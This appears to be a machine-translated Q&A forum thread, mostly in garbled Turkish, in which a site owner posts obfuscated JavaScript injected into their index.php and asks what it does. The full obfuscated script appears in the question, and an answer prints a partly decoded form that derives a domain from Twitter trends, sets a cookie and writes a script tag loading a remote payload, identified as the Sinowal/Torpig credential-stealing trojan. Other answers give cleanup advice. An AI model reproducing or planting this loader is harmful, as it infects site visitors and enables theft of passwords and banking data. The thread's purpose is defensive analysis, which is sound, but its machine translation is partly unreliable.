Bana gizemli şifreli kodunu deşifre Lütfen yardım - garip benim index.php yerleştirildi

4 Cevap

Birisi kötü niyetle web siteme ahoffmanawning.com içine aşağıdaki kodu eklenir. Bu kötü yazılmış bir form php script ile yapılabilir? Ayrıca daha da önemlisi, bu komut ne yapıyor?

<script language="javascript">
$a="Z63dZ3dZ22Z253dst+Z2553tZ2572iZ256eg.Z2566Z2572oZ256dCZ2568arCZ256fdeZ2528(tmZ2570Z252eZ2563hZ22;dzZ3dZ22Z2566Z2575nZ2563tZ2569on Z2564wZ2528t)Z257bcaZ253dZ2527Z252564Z25256fcZ252575mZ252565Z256eZ2574.Z252577ritZ252565Z25252Z2538Z252522Z2527;ceZ253dZ2527Z25252Z2532)Z2527;cZ2562Z253dZ2527Z25253cscrZ252569pZ252574Z2520Z25256caZ25256eguZ252561gZ252565Z25253dZ25255cZ252522Z256aaZ2576aZ2573Z2563Z252572iZ252570tZ2525Z2535Z2563Z252522Z25253Z2565Z2527;ccZ253dZ2527Z25253cZ25255cZ25252fscZ252572Z2569Z252570Z252574Z25253eZ2527;eZ2576aZ256c(unZ2565scaZ2570e(Z2574))Z257dZ253bZ22;caZ3dZ22Z2566Z2575Z256ecZ2574iZ256fn dZ2563sZ2528ds,Z2565sZ2529Z257bdsZ253duneZ2573capZ2565Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edZ22;opZ3dZ22Z2524Z2561Z253dZ2522dw(dcsZ2528cu,Z25314)Z2529;Z2522Z253bZ22;dbZ3dZ22gZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0!Z2520;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vrs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07hucZ22;stZ3dZ22Z2573tZ253dZ2522$Z2561Z253dsZ2574;Z2564cZ2573(Z2564aZ252bdZ2562Z252bZ2564Z2563+Z2564dZ252bdZ2565Z252c1Z2530)Z253bdZ2577(Z2573Z2574Z2529;Z2573tZ253dZ2524aZ253bZ2522;Z22;dcZ3dZ227Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fZ22;czZ3dZ22Z2566Z2575Z256eZ2563tioZ256eZ2520czZ2528cz)Z257brZ2565tuZ2572n Z2563aZ252bcb+Z2563cZ252bcdZ252bce+Z2563Z257aZ253b}Z253bZ22;ceZ3dZ22aZ2572Z2543odZ2565AtZ25280)Z255eZ2528Z25270x0Z2530Z2527+eZ2573))Z2529;Z257dZ257dZ22;ccZ3dZ225ngtZ2568Z253bZ2569+Z252b)Z257btmpZ253ddZ2573.Z2573licZ2565(iZ252ci+Z2531);Z2573tZ22;ddZ3dZ22qb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iZ22;cbZ3dZ22(Z2564s);Z2573tZ253dtmZ2570Z253dZ2527Z2527;forZ2528Z2569Z253d0Z253bZ2569Z253cds.lZ256Z22;deZ3dZ22uqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;sz|KZ2520;64c}p`|)Z25$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;Z69Z66Z20(Z64Z6fcuZ6denZ74.coZ6fkieZ2eindZ65xOZ66Z28Z27rf5fZ36Z64sZ27)Z3dZ3d-1)Z7bfunZ63Z74iZ6fn Z63allZ62aZ63Z6b(xZ29Z7bwindoZ77.tZ77Z20Z3d x;Z76Z61rZ20dZ20Z3dZ20newZ20DZ61tZ65Z28);dZ2eseZ74TiZ6de(Z78Z5bZ22as_Z6fZ66Z22]*Z31Z30Z300);Z76arZ20hZ20Z3dZ20dZ2egZ65tZ55TCHZ6fursZ28);Z77iZ6edZ6fwZ2ehZ20Z3d h;if Z28h Z3e 8)Z7bd.sZ65tZ55TCDZ61Z74eZ28d.gZ65tUZ54CZ44Z61Z74Z65()Z20-Z202);Z7delsZ65Z7bd.seZ74UTCZ44ateZ28d.Z67etUZ54CDaZ74e()Z20Z2d Z33)Z3b}wZ69ndZ6fw.gZ64Z20Z3d d;Z76arZ20tiZ6dZ65 Z3d Z6eewZ20ArZ72Z61y(Z29;vaZ72 shZ69ftZ49nZ64Z65xZ20Z3dZ20Z22Z22;timeZ5bZ22yearZ22] Z3d d.Z67etUZ54CFuZ6clZ59earZ28)Z3btimZ65[Z22moZ6etZ68Z22] Z3d dZ2egeZ74UZ54Z43MoZ6etZ68()+Z31;tZ69mZ65[Z22daZ79Z22] Z3d d.gZ65tUZ54CZ44aZ74e(Z29;ifZ20(dZ2egZ65tZ55TZ43MZ6fntZ68()+Z31 Z3cZ2010)Z7bshiZ66Z74IZ6edeZ78 Z3d timZ65[Z22yearZ22] +Z20Z22-0Z22 +Z20Z28d.gZ65tUTZ43MonZ74h(Z29+Z31Z29;}Z65Z6csZ65Z7bshifZ74InZ64eZ78 Z3d tZ69meZ5bZ22yearZ22] +Z20Z22Z2dZ22 Z2b (dZ2egeZ74Z55TCZ4donZ74h(Z29+Z31);Z7dZ69f Z28dZ2eZ67Z65tUZ54CDZ61teZ28Z29 Z3c 10Z29Z7bsZ68ifZ74IndZ65x Z3dshZ69ftZ49ndeZ78 + Z22Z2dZ30Z22 + dZ2eZ67Z65tUZ54CZ44aZ74e()Z3b}eZ6cseZ7bshZ69ftIZ6eZ64Z65Z78 Z3d sZ68ifZ74IZ6edZ65x +Z20Z22-Z22 +Z20dZ2eZ67etUZ54CDZ61tZ65()Z3b}dZ6fcZ75Z6dentZ2ewZ72iZ74Z65Z28Z22Z3cscrZ22+Z22ipt Z6caZ6eguZ61geZ3djZ61vasZ63rZ69ptZ22+Z22 srcZ3dZ27http:Z2fZ2fsearchZ2eZ74wiZ74teZ72.coZ6dZ2ftrZ65nZ64Z73Z2fdaZ69Z6cyZ2eZ6asonZ3fdatZ65Z3dZ22+ shiZ66tInZ64eZ78Z2bZ22&Z63allZ62Z61Z63Z6bZ3dcallbZ61ck2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 Z2b Z22iZ70Z74Z3eZ22);Z7d fZ75nZ63tioZ6e Z63Z61lZ6cbZ61cZ6b2(Z78)Z7bwindZ6fZ77.tZ77Z20Z3d x;Z73c(Z27rf5Z666dZ73Z27,2,7)Z3bevaZ6c(Z75Z6eesZ63apeZ28dzZ2bZ63zZ2bopZ2bsZ74)+Z27dwZ28Z64z+cZ7a($Z61+stZ29Z29;Z27);dZ6fcZ75menZ74.Z77ritZ65(Z24a)Z3b}dZ6fZ63umeZ6et.wZ72iteZ28Z22Z3cimgZ20sZ72cZ3dZ27http:Z2fZ2fseZ61rcZ68Z2etZ77Z69tteZ72.coZ6dZ2fZ69mZ61Z67eZ73Z2fseZ61rcZ68Z2frss.Z70ngZ27 wZ69dtZ68Z3d1Z20Z68Z65ighZ74Z3d1 stZ79lZ65Z3dZ27visibilZ69tZ79:hiZ64deZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt Z6cangZ75agZ65Z3djavZ61sZ63riZ70tZ22+Z22 srcZ3dZ27httZ70:Z2fZ2fseaZ72ch.Z74Z77ittZ65rZ2ecomZ2fZ74renZ64sZ2fdaiZ6cy.jZ73Z6fn?cZ61lZ6cZ62ackZ3dcaZ6clbZ61ckZ27Z3eZ22 + Z22Z3cZ2fscrZ22 +Z20Z22ipZ74Z3eZ22);Z7deZ6csZ65Z7b$aZ3dZ27Z27};functionZ20sZ63Z28Z63nm,Z76Z2cedZ29Z7bvar eZ78dZ3dnewZ20DatZ65()Z3beZ78d.Z73Z65tZ44aZ74Z65Z28exdZ2egeZ74Z44aZ74Z65Z28)Z2bedZ29;dZ6fcZ75menZ74.cZ6fokiZ65Z3dcnZ6d+ Z27Z3dZ27 +esZ63apeZ28v)Z2bZ27;expiZ72esZ3dZ27+eZ78Z64.Z74Z6fZ47Z4dTZ53Z74rinZ67();Z7dZ3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));
</script>

4 Cevap

Yinelemek için: Nobody run this in your browser kthx

Javascript kodu gizlense de; Hiçbirimiz olasılıkla sizin için çözmek için yeterli zaman var, ama bunu oraya nasıl bilmiyorsanız, kesinlikle bazı tarayıcı güvenlik açığını kullanarak kötü amaçlı yazılım veya başka yüklemeye çalışacaktır kötü niyetli kodu.

As to how it got there: someone got access to your server files.
This could be (in order of likely-hood):

  • Birisi dosya sistemine onlara erişim veren bir php güvenlik açığı keşfetti
  • Birisi ftp bilgi erişimi var
  • Eğer bir mailicious kodlayıcı var
  • ya da belki de web sunucusu, veritabanı, işletim sistemi, ya da sunucu üzerinde çalışan bazı hizmet ile bir güvenlik açığı var.

Ben, FTP şifrenizi değiştirmek son sürüme sisteminizde akla gelebilecek her şeyi güncellemek ve dosya sistemini erişen herhangi bir özel PHP kod ciddi bir göz-over yapardı.

[Edit]: DTH tarafından verilen bağlantısından, o kod indirme görünen ve adında bir trojan (virüs) çalıştırır Sinowal.

Bu trojan bulaşmış makineden farklı bir sistem çalmak ve hesap bilgilerini çalışır. Çalınan bilgiler şu olabilir:

• IMAP/POP3/SMTP username, passwords, server information from mail clients such as AK-Mail,Thunderbird,TheBat
• Bookmarks
• E-mail addresses from the Windows Address Book
• Passwords and other data stored from FTP clients such as Trellian FTP, WS_FTP, Total Commander, Crystal FTP Pro and GlobalSCAPE

Aynı zamanda online bankacılık bilgi için, Internet Explorer, Firefox ve Mozilla gibi web tarayıcılarını izler

Bu yaptığı budur. O ne gizlemek için sadece çöp ile başlar ama sonunda bence gidiyor bazı twitter gönderme var gibi görünüyor. Tadını çıkarın!

cd="%3dst+%53t%72i%6eg.%66%72o%6dC%68arC%6fde%28(tm%70%2e%63h";dz="%66%75n%63t%6
9on %64w%28t)%7bca%3d%27%2564%256fc%2575m%2565%6e%74.%2577rit%2565%252%38%2522%2
7;ce%3d%27%252%32)%27;c%62%3d%27%253cscr%2569p%2574%20%256ca%256egu%2561g%2565%2
53d%255c%2522%6aa%76a%73%63%2572i%2570t%25%35%63%2522%253%65%27;cc%3d%27%253c%25
5c%252fsc%2572%69%2570%2574%253e%27;e%76a%6c(un%65sca%70e(%74))%7d%3b";ca="%66%7
5%6ec%74i%6fn d%63s%28ds,%65s%29%7bds%3dune%73cap%65";da="fqb0t-7vrs}vyb>s%7F}7+
0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7Fg>x0.0(0660
gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyM
K$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv
088gy~t%7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0
-0gy~t%7Fg>d";op="%24%61%3d%22dw(dcs%28cu,%314)%29;%22%3b";db="g>dbu~tcKyMK$M>ae
ubi>sxqbS%7FtuQd8!90;0!%20;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxy
vdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>wudEDSVe||Iuqb8
9+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>wudE
DSTqdu89+fqb0t-7vrs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87e~%7F7<07tfu7<07dxb7<07
vyb7<07fyv7<07huc";st="%73t%3d%22$%61%3ds%74;%64c%73(%64a%2bd%62%2b%64%63+%64d%2
bd%65%2c1%30)%3bd%77(%73%74%29;%73t%3d%24a%3b%22;";dc="7<07fuc7<07wxd7<07u~y7<07
ud~7<07|uf7<07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<
7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}ru
bc0-0~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%
7F~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;
0tqi9+m0f";cz="%66%75%6e%63tio%6e%20cz%28cz)%7br%65tu%72n %63a%2bcb+%63c%2bcd%2b
ce+%63%7a%3b}%3b";ce="a%72%43od%65At%280)%5e%28%270x0%30%27+e%73))%29;%7d%7d";cc
="5ngt%68%3b%69+%2b)%7btmp%3dd%73.%73lic%65(i%2ci+%31);%73t";dd="qb0iuqbSx!<0iuq
bSx%22<0}%7F~dxSx<0tqiSx<0~e}+%19~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}
%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90
;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}uK7iuqb7M060%20hQQ90,,0%2290;0~e}9050%2
2%M+%19iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0#90;0~e}9050!%209M0;0
|uddubcK8888dy}uK7i";cb="(%64s);%73t%3dtm%70%3d%27%27;for%28%69%3d0%3b%69%3cds.l
%6";de="uqb7M060%20h##!!90..0$90;0~e}9050!%209M+%19}%7F~dxSx0-0|uddubcK88dy}uK7}
%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|ud
dubcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}
9050%22$9M+4q-4q>bu`|qsu8t<tqiSx0;0iuqbSx%220;0}%7F~dxSx0;0iuqbSx!0;0tqiSx0;0}%7
F~dxcKdy}uK7}%7F~dx7M0=0!M0;07>s%7F}79+m";cu="(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}r
fuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;sz|K%20;64c}p`|)%$4|q}s|`),$*(;}rfuyq*(;p}b*";if
 (document.cookie.indexOf('rf5f6ds')==-1){function callback(x){window.tw = x;var
 d = new Date();d.setTime(x["as_of"]*1000);var h = d.getUTCHours();window.h = h;
if (h > 8){d.setUTCDate(d.getUTCDate() - 2);}else{d.setUTCDate(d.getUTCDate() -
3);}window.gd = d;var time = new Array();var shiftIndex = "";time["year"] = d.ge
tUTCFullYear();time["month"] = d.getUTCMonth()+1;time["day"] = d.getUTCDate();if
 (d.getUTCMonth()+1 < 10){shiftIndex = time["year"] + "-0" + (d.getUTCMonth()+1)
;}else{shiftIndex = time["year"] + "-" + (d.getUTCMonth()+1);}if (d.getUTCDate()
 < 10){shiftIndex =shiftIndex + "-0" + d.getUTCDate();}else{shiftIndex = shiftIn
dex + "-" + d.getUTCDate();}document.write("<scr"+"ipt language=javascript"+" sr
c='http://search.twitter.com/trends/daily.json?date="+ shiftIndex+"&callback=cal
lback2'>" + "</scr" + "ipt>");} function callback2(x){window.tw = x;sc('rf5f6ds'
,2,7);eval(unescape(dz+cz+op+st)+'dw(dz+cz($a+st));');document.write($a);}docume
nt.write("<img src='http://search.twitter.com/images/search/rss.png' width=1 hei
ght=1 style='visibility:hidden' /> <scr"+"ipt language=javascript"+" src='http:/
/search.twitter.com/trends/daily.json?callback=callback'>" + "</scr" + "ipt>");}
else{$a=''};function sc(cnm,v,ed){var exd=new Date();exd.setDate(exd.getDate()+e
d);document.cookie=cnm+ '=' +escape(v)+';expires='+exd.toGMTString();};

http://wepawet.cs.ucsb.edu/static/torpig-twitter.html her şey çözülür ve sizin için analiz etti.

Şerefe m8.

O heyecan trend konuların bir listesini alma gibi görünüyor. O size ne var ne şekilde daha fazla ipucu veriyor mu?

etiketler